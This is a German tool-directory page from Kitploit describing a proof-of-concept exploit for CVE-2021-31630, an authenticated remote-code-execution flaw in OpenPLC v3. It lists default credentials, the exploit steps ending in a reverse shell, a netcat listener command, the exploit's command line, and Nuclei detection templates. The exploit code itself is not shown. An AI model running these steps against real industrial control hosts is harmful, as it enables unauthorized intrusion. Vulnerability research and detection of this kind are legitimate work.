Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/machevalia/openplc-cve-2021-31630-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubmachevalia/openplc-cve-2021-31630-rce

OpenPLC-CVE-2021-31630-RCE

Python 3.13+ Proof-of-Concept-Exploit für CVE-2021-31630, das eine authentifizierte Remote-Codeausführung auf OpenPLC v3 durch schädlichen Hardware-Layer-Upload ermöglicht. Enthält Nuclei-Erkennungsvorlagen für Standard-Anmeldedaten und Schwachstellenprüfungen.

Repository anzeigen
325vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

OpenPLC v3 Authentifizierte RCE (CVE-2021-31630)

Dies ist ein moderner, mit Python 3.13+ kompatibler Proof-of-Concept-Exploit für CVE-2021-31630, eine Schwachstelle in OpenPLC v3, die es einem authentifizierten Benutzer ermöglicht, eine benutzerdefinierte Hardware-Schicht mit bösartigem Code hochzuladen, was zu einer Remote-Codeausführung (RCE) auf dem Host führt.

Ursprüngliche Schwachstellenentdeckung und -beratung durch Fellipe Oliveira. Diese Neuimplementierung und Modernisierung verwendet httpx, CLI-Tooling, Logging und sicherere Erkennungstechniken.

Exploit-Übersicht

  • Schwachstelle: CVE-2021-31630
  • Komponente: OpenPLC v3 Web Server
  • Auswirkung: Authentifizierte Remote-Codeausführung
  • Standard-Anmeldedaten: openplc:openplc

Exploit-Ablauf

  1. Anmeldung mit gültigen Anmeldedaten
  2. Hochladen eines bösartigen C-Codes als benutzerdefinierte Hardware-Schicht
  3. Kompilierung auslösen
  4. Ausführung auslösen (optional)
  5. Reverse-Shell-Verbindung empfangen

Verwendung

  1. Starten Sie einen Listener:
root@kitploit:~
nc -lvnp 9001
  1. Führen Sie den Exploit aus:
root@kitploit:~
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001

Optionale Flags:

  • -u Benutzername (Standard: openplc)
  • -p Passwort (Standard: openplc)
  • -t Timeout in Sekunden (Standard: 20)

Funktionen

  • Kompatibel mit Python 3.13+
  • Erstellt mit httpx
  • Logging-Unterstützung für saubere Ausgabe
  • Modulare Funktionen für einfachere Wiederverwendung
  • Nuclei-Erkennungsvorlagen enthalten

Nuclei-Erkennungsvorlagen

  1. Überprüfung auf Standard-Anmeldedaten
root@kitploit:~
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
  1. Passive RCE-Schwachstellenprüfung
root@kitploit:~
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080

Die zweite Vorlage meldet sich an und versucht einen harmlosen Payload-Upload + Kompilierung, um eine wahrscheinliche Schwachstelle zu bestätigen – ohne eine tatsächliche Codeausführung auszulösen.

Enthaltene Dateien

  • OpenPLC_CVE_2021_31630.py – Python 3.13+ Exploit
  • nuclei-templates/openplc-default-login.yaml – Erkennt Standard-Anmeldedaten
  • nuclei-templates/openplc-authenticated-rce-check.yaml – Erkennt anfälliges Verhalten sicher

⚠️ Rechtliches / Ethik

Dieser Code dient ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken. Nicht ohne ausdrückliche Genehmigung des Systembesitzers verwenden.

Tool herunterladen